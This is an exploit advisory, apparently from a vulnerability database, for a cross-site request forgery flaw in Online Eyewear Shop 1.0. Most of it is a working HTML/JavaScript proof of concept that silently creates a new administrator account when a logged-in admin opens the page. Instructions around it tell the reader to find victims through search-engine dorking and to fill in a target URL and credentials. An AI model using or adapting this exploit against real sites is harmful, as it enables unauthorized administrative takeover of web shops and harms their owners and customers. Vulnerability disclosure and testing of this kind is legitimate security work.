Headline
Online Eyewear Shop 1.0 Cross Site Request Forgery
Online Eyewear Shop version 1.0 suffers from a cross site request forgery vulnerability.
=============================================================================================================================================| # Title : Online Eyewear Shop v1.0 CSRF Add ADmin Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) || # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202301/kashipara.com_php-oews-zip.zip |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code add new admin .[+] Line 06 set your target.[+] Line 15 + 19 set your user & pass[+] save code as poc.html .<!DOCTYPE html> <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/oews/admin/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true; var body = "-----------------------------\r\n" + "Content-Disposition: form-data; name=\"username\"\r\n" + "\r\n" + "indoushka\r\n" + "-----------------------------\r\n" + "Content-Disposition: form-data; name=\"password\"\r\n" + "\r\n" + "Hacked\r\n" + "-----------------------------\r\n" + "Content-Disposition: form-data; name=\"type\"\r\n" + "\r\n" + "1\r\n" + "-------------------------------\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================